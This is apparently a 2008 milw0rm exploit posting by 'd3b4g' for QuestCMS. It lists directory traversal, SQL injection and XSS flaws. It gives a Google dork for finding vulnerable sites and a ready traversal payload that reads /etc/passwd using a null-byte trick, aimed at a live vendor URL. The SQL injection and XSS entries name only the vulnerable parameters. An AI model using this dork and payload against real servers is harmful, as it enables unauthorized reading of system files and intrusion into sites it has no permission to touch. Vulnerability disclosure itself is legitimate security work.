54 lines
No EOL
1.6 KiB
Text
54 lines
No EOL
1.6 KiB
Text
--------------------------------------------------------------------------------
|
|
|
|
Title : Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql]
|
|
|
|
--------------------------------------------------------------------------------
|
|
#Author: d3b4g
|
|
|
|
|
|
#contact: bl4ckend[at]gmail[dot]com
|
|
|
|
--------------------------------------------------------------------------------
|
|
Affected software:
|
|
--------------------------------------------------------------------------------
|
|
Application : Questwork Web Content Management system (QuestCMS)
|
|
URL : http://www.questwork.com
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
dork : allinurl:"/questcms/"
|
|
--------------------------------------------------------------------------------
|
|
Directory traversal vulnibility
|
|
=============================
|
|
Exploit : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html
|
|
|
|
Live demo : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html
|
|
|
|
|
|
---------------------------------------------------------------------------------
|
|
|
|
sql injection:
|
|
==============
|
|
Vuln file:questcms/main/main.php?obj=[sql]
|
|
|
|
|
|
XSS:
|
|
====
|
|
exploit:/main/main.php?cx=[Xss]
|
|
--------------------------------------------------------------------------------
|
|
|
|
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
greetz:
|
|
|
|
All my friends,milw0rm...
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
|
|
|
|
--------------------------------- [ www.hotlism.org ] --------------------------------------
|
|
|
|
# milw0rm.com [2008-10-27] |